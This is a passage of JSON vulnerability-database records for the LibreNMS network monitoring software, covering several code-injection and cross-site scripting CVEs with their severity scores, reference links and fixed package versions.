6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-04-25T18:58:11Z/"}],"url":"https://huntr.dev/bounties/becfecc4-22a6-4f94-bf83-d6030b625fdc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-4068","reference_id":"","reference_type":"","scores":[{"value":"7.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-4068"},{"reference_url":"https://github.com/advisories/GHSA-f3hw-3h74-wr98","reference_id":"GHSA-f3hw-3h74-wr98","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f3hw-3h74-wr98"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/148559?format=json","purl":"pkg:composer/librenms/librenms@22.10.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2ccw-938t-yyaj"},{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-6cy6-6ss3-tqaz"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-af73-74xn-9fap"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-cvn6-ggwj-9fcm"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-mhf4-mtt1-t3fn"},{"vulnerability":"VCID-n5u3-c21p-ukas"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-nyn8-7mkk-zbb3"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-sa1y-ej2a-fba9"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-u1km-tzd2-5bhq"},{"vulnerability":"VCID-us6w-wwkm-dqc5"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-w9mu-bbkx-sbeq"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-y3qu-d719-jff6"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@22.10.0"}],"aliases":["CVE-2022-4068","GHSA-f3hw-3h74-wr98"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qqnn-43db-guek"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/46036?format=json","vulnerability_id":"VCID-sa1y-ej2a-fba9","summary":"LibreNMS Code Injection vulnerability\nCode Injection in GitHub repository librenms/librenms prior to 23.9.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-4977","reference_id":"","reference_type":"","scores":[{"value":"0.00059","scoring_system":"epss","scoring_elements":"0.18876","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00059","scoring_system":"epss","scoring_elements":"0.18774","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00059","scoring_system":"epss","scoring_elements":"0.18755","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00059","scoring_system":"epss","scoring_elements":"0.18835","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-4977"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/1194934d31c795a3f6877a96ffaa34b1f475bdd0","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-09-20T17:32:02Z/"}],"url":"https://github.com/librenms/librenms/commit/1194934d31c795a3f6877a96ffaa34b1f475bdd0"},{"reference_url":"https://huntr.dev/bounties/3db8a1a4-ca2d-45df-be18-a959ebf82fbc","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"},{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-09-20T17:32:02Z/"}],"url":"https://huntr.dev/bounties/3db8a1a4-ca2d-45df-be18-a959ebf82fbc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-4977","reference_id":"CVE-2023-4977","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-4977"},{"reference_url":"https://github.com/advisories/GHSA-57m2-mpc7-gwgx","reference_id":"GHSA-57m2-mpc7-gwgx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-57m2-mpc7-gwgx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/66945?format=json","purl":"pkg:composer/librenms/librenms@23.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-6cy6-6ss3-tqaz"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-af73-74xn-9fap"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-cvn6-ggwj-9fcm"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-mhf4-mtt1-t3fn"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-y3qu-d719-jff6"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@23.9.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539238?format=json","purl":"pkg:composer/librenms/librenms@201609","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@201609"}],"aliases":["CVE-2023-4977","GHSA-57m2-mpc7-gwgx"],"risk_score":3.3,"exploitability":"0.5","weighted_severity":"6.6","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-sa1y-ej2a-fba9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50222?format=json","vulnerability_id":"VCID-t5mk-a8n2-rkcg","summary":"LibreNMS has a Stored XSS in Alert Rule\nA stored Cross-Site Scripting (XSS) vulnerability exists in LibreNMS (<= 25.12.0) in the creation of Alert Rules. This allows a user with the admin role to inject malicious JavaScript, which will be executed when the alert rules page is viewed.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26989","reference_id":"","reference_type":"","scores":[{"value":"3e-05","scoring_system":"epss","scoring_elements":"0.00137","published_at":"2026-06-09T12:55:00Z"},{"value":"3e-05","scoring_system":"epss","scoring_elements":"0.00138","published_at":"2026-06-08T12:55:00Z"},{"value":"3e-05","scoring_system":"epss","scoring_elements":"0.00139","published_at":"2026-06-07T12:55:00Z"},{"value":"3e-05","scoring_system":"epss","scoring_elements":"0.00141","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-26989"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/087608cf9f851189847cb8e8e5ad002e59170c58","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-20T15:26:36Z/"}],"url":"https://github.com/librenms/librenms/commit/087608cf9f851189847cb8e8e5ad002e59170c58"},{"reference_url":"https://github.com/librenms/librenms/pull/19039","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-20T15:26:36Z/"}],"url":"https://github.com/librenms/librenms/pull/19039"},{"reference_url":"https://github.com/librenms/librenms/releases/tag/26.2.0","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-20T15:26:36Z/"}],"url":"https://github.com/librenms/librenms/releases/tag/26.2.0"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26989","reference_id":"CVE-2026-26989","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26989"},{"reference_url":"https://github.com/advisories/GHSA-6xmx-xr9p-58p7","reference_id":"GHSA-6xmx-xr9p-58p7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6xmx-xr9p-58p7"},{"reference_url":"https://github.com/librenms/librenms/security/advisories/GHSA-6xmx-xr9p-58p7","reference_id":"GHSA-6xmx-xr9p-58p7","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:L"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-02-20T15:26:36Z/"}],"url":"https://github.com/librenms/librenms/security/advisories/GHSA-6xmx-xr9p-58p7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74102?format=json","purl":"pkg:composer/librenms/librenms@26.2.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@26.2.0"}],"aliases":["CVE-2026-26989","GHSA-6xmx-xr9p-58p7"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-t5mk-a8n2-rkcg"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/46030?format=json","vulnerability_id":"VCID-u1km-tzd2-5bhq","summary":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in librenms/librenms.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-4982","reference_id":"","reference_type":"","scores":[{"value":"6e-05","scoring_system":"epss","scoring_elements":"0.00343","published_at":"2026-06-08T12:55:00Z"},{"value":"6e-05","scoring_system":"epss","scoring_elements":"0.00346","published_at":"2026-06-07T12:55:00Z"},{"value":"6e-05","scoring_system":"epss","scoring_elements":"0.00352","published_at":"2026-06-06T12:55:00Z"},{"value":"6e-05","scoring_system":"epss","scoring_elements":"0.00344","published_at":"2026-06-09T12:55:00Z"},{"value":"6e-05","scoring_system":"epss","scoring_elements":"0.00351","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-4982"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/2c5960631c49f7414f61b6d4dcd305b07da05769","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-09-20T17:28:05Z/"}],"url":"https://github.com/librenms/librenms/commit/2c5960631c49f7414f61b6d4dcd305b07da05769"},{"reference_url":"https://huntr.dev/bounties/d3c2dd8a-883c-400e-a1a7-326c3fd37b9e","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-09-20T17:28:05Z/"}],"url":"https://huntr.dev/bounties/d3c2dd8a-883c-400e-a1a7-326c3fd37b9e"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-4982","reference_id":"CVE-2023-4982","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-4982"},{"reference_url":"https://github.com/advisories/GHSA-m6jj-fgmh-3p8r","reference_id":"GHSA-m6jj-fgmh-3p8r","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-m6jj-fgmh-3p8r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/66945?format=json","purl":"pkg:composer/librenms/librenms@23.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-6cy6-6ss3-tqaz"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-af73-74xn-9fap"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-cvn6-ggwj-9fcm"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-mhf4-mtt1-t3fn"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-y3qu-d719-jff6"},{"vulnerability":"VCID-y5mq-m57f-b3bx"},{"vulnerability":"VCID-yhmt-yukb-kuge"},{"vulnerability":"VCID-ywp5-cwm9-afb5"},{"vulnerability":"VCID-z744-37t6-pud6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@23.9.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539238?format=json","purl":"pkg:composer/librenms/librenms@201609","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/librenms/librenms@201609"}],"aliases":["CVE-2023-4982","GHSA-m6jj-fgmh-3p8r"],"risk_score":4.4,"exploitability":"0.5","weighted_severity":"8.8","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-u1km-tzd2-5bhq"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/46038?format=json","vulnerability_id":"VCID-us6w-wwkm-dqc5","summary":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in librenms/librenms.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-4979","reference_id":"","reference_type":"","scores":[{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11739","published_at":"2026-06-08T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.1182","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11856","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.1175","published_at":"2026-06-09T12:55:00Z"},{"value":"0.00038","scoring_system":"epss","scoring_elements":"0.11862","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-4979"},{"reference_url":"https://github.com/librenms/librenms","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/librenms/librenms"},{"reference_url":"https://github.com/librenms/librenms/commit/49d66fa31b43acef02eaa09ee9af15fe7e16cd03","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-09-20T17:29:14Z/"}],"url":"https://github.com/librenms/librenms/commit/49d66fa31b43acef02eaa09ee9af15fe7e16cd03"},{"reference_url":"https://huntr.dev/bounties/e67f8f5d-4048-404f-9b86-cb6b8719b77f","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2024-09-20T17:29:14Z/"}],"url":"https://huntr.dev/bounties/e67f8f5d-4048-404f-9b86-cb6b8719b77f"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-4979","reference_id":"CVE-2023-4979","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-4979"},{"reference_url":"https://github.com/advisories/GHSA-jp3c-g46v-jg2c","reference_id":"GHSA-jp3c-g46v-jg2c","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jp3c-g46v-jg2c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/66945?format=json","purl":"pkg:composer/librenms/librenms@23.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2t5k-atx8-eycd"},{"vulnerability":"VCID-2w1a-3ym6-hygb"},{"vulnerability":"VCID-2z9m-fwyr-17b3"},{"vulnerability":"VCID-3prv-5fpd-c3hd"},{"vulnerability":"VCID-5f5f-pkcz-bfhr"},{"vulnerability":"VCID-5hwq-6gme-c3gh"},{"vulnerability":"VCID-5vg7-7y5w-muhw"},{"vulnerability":"VCID-6cy6-6ss3-tqaz"},{"vulnerability":"VCID-7f5s-p5u4-abhh"},{"vulnerability":"VCID-7m7b-578h-bqhj"},{"vulnerability":"VCID-7s6j-vmn5-p7eh"},{"vulnerability":"VCID-8ks5-6azh-67ed"},{"vulnerability":"VCID-8nsn-f1fc-6ucm"},{"vulnerability":"VCID-98mh-t1va-xqa8"},{"vulnerability":"VCID-99dx-dees-2fg3"},{"vulnerability":"VCID-af73-74xn-9fap"},{"vulnerability":"VCID-appm-zs6z-v3b2"},{"vulnerability":"VCID-bfnn-xz3r-sfcv"},{"vulnerability":"VCID-ca8g-usbx-5ydu"},{"vulnerability":"VCID-cvn6-ggwj-9fcm"},{"vulnerability":"VCID-dff6-r5mp-p3d5"},{"vulnerability":"VCID-f9v9-rmse-cbcg"},{"vulnerability":"VCID-fc9k-4dhn-m7du"},{"vulnerability":"VCID-gj21-fy13-33h2"},{"vulnerability":"VCID-h5y9-mrn4-q7br"},{"vulnerability":"VCID-hacq-7c9c-qkaz"},{"vulnerability":"VCID-hj1w-rpxt-4ygp"},{"vulnerability":"VCID-jjwh-716d-73hc"},{"vulnerability":"VCID-jwh7-vtxs-aqhr"},{"vulnerability":"VCID-kkqd-nzsw-23cr"},{"vulnerability":"VCID-mchv-4jpx-audc"},{"vulnerability":"VCID-me5y-39aj-fkhe"},{"vulnerability":"VCID-mhf4-mtt1-t3fn"},{"vulnerability":"VCID-ncgs-c7tb-gbfg"},{"vulnerability":"VCID-pksv-nv1a-sqev"},{"vulnerability":"VCID-qhpe-7ws8-kqb7"},{"vulnerability":"VCID-t5mk-a8n2-rkcg"},{"vulnerability":"VCID-uuwy-rk5r-tkc7"},{"vulnerability":"VCID-ux81-kyy9-bkaz"},{"vulnerability":"VCID-uzy1-yh5d-dqbt"},{"vulnerability":"VCID-v2sw-u952-7qfz"},{"vulnerability":"VCID-v3wv-6q6b-fqa3"},{"vulnerability":"VCID-vepx-waum-1bfc"},{"vulnerability":"VCID-whxh-v47a-8yhh"},{"vulnerability":"VCID-y3qu-d719-jff6"},{"vulnerability":"VCID-y5